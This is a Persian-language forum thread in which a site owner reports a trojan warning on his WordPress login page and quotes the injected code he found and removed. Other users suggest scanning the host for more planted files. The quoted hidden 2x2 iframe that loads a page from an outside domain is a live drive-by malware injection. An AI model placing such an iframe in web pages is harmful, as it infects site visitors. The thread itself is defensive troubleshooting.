رفتن به مطلب

ویروسی شدن wp-login.php


Farzad

پست های پیشنهاد شده

سلام

روی یکی از وب سایت هام وقتی می خوام لوگین کنم ، آنتی ویروس کاسپر صفحه رو بلوکه میکنه و تروجان heru رو معرفی میکنه.

ضمنا توی همین فایل wp-login.php این کد فریم رو پیدا کردم :


<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://inversionesrd.net/zhhd.html?i=942919></iframe>

به نظر تون چطوری ویرایش روی wp-login.php شده ؟

این بخش رو که برداشتم بدون مشکل صفجه لوگین بالا اومد. ..

ویرایش شده توسط Farzad
لینک به ارسال

احتمالاً عده ای سعی در هک وب شما رو داشتن . برای منم پیش اومده بود چمد وقت پیش فایل های مشکوکی رو توی روت وردپرسم دیدم و وقتی چک کردم دیدم نود 32 و آنتی ویروس clame اونا رو شناسایی کردن و مجبور شدم چند بار کل هاست رو اسکن کنم تا فایل های دیگه رو هم پیدا کنم . بیشتر از 30 تا فایل مخرب رو شناسایی کرد که نمیدونم چطوری وارد شدن . ولی خوشبختنه زود متوجه شدم .

شما هم بررسی کنید ببینید غیر از این مورد فایل های مخرب دیگه ای با نام های مشابه فایل های وردپرسی رو روی سرورتون اپلود نکرده باشن .

لینک به ارسال

هاست رو با چی اسکن کردین ؟

من هاستم دایرکت ادمینه و اسکنر ویروس نداره...

فکر کنم فایل های دیگه ای هم اپلود کرده باشن که تونستن به این فایل دسترسی پیدا کنن و ادیتش کنن...

لینک به ارسال

من محتویات وردپرس رو توی وی پی اس دانلود کردم و با آنتی ویروس clame اسکن کردم و فایل های شناسایی شده رو پاک کردم و دوباره به هاست انتقال دادم .

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...